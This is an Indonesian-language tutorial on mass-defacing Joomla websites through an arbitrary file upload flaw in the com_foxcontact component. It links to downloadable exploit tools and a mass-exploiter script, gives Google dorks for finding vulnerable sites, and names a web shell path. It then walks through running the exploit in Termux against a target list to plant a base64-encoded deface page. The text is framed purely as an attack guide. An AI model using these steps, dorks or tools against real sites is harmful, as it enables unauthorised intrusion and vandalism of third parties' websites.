Tutorial - Cara Deface Joomla com_foxcontact
COPYRIGHTS
======================================================================
Referensi: https://www.draxploit.web.id/2020/07/cara-deface-joomla-comfoxcontact-with_6.html
Download Tools Exploit: http://www.mediafire.com/file/yr1wiecuqad14vc/fox.zip
Shell Path: http://www.site.com/components/com_foxcontact/_fire.php
Exploit Command: python3 exploit.py --url http://site.com --cid 123
======================================================================
Keyword:
Cara deface joomla arbitary file upload, Cara Deface Joomla com_foxcontact, Deface arbitary file upload, Tutorial joomla mass deface, WLB-2018040066, Dork Joomla com_foxcontact, Auto deface joomla.
-dork : "powered by fox contact" atau "inurl:index.php?option=com_foxcontact"
-tools auto exploit dan mass exploiter joomla com_foxcontact : https://pastebin.com/raw/eRCNMehy
-termux
Langkah-langkah
1. Pertama kalian buka toolsnya lalu salin semua source codenya ke aplikasi text editor atau sebagainya. contoh: anwriter
2. Kalian edit script dibawah, menjadi:
private $hacker = "NICK HACKER KALIAN";private $deface = 'SCRIPT DEFACE KALIAN YANG SUDAH DI ENCODE MENJADI BASE64';$this->file->deface = "nakanosec.html";
4.Jalankan Exploit dengan perintah dibawah ini
$pkg install php nano -y$pip2 install requests$nano exp.php
5.Pastekan seluruh source code yang telah di salin tadi
Simpan code dengan menekan
ctrl + x + y + enter
Kemudian kumpulkan semua list target yang kalian punya dan simpan menjadi list.txt di termux dengan mengetik
nano list.txtKlik Ctrl + x + y + enter
5.Kemudian Jalankan tools dengan perintah
php exp.php list.txt
6.Tunggu sampai proses selesai lalu cek result atau hasil di file result_foxcontact.txt
Hasil: http://www.namaweb.com/nakanosec.html/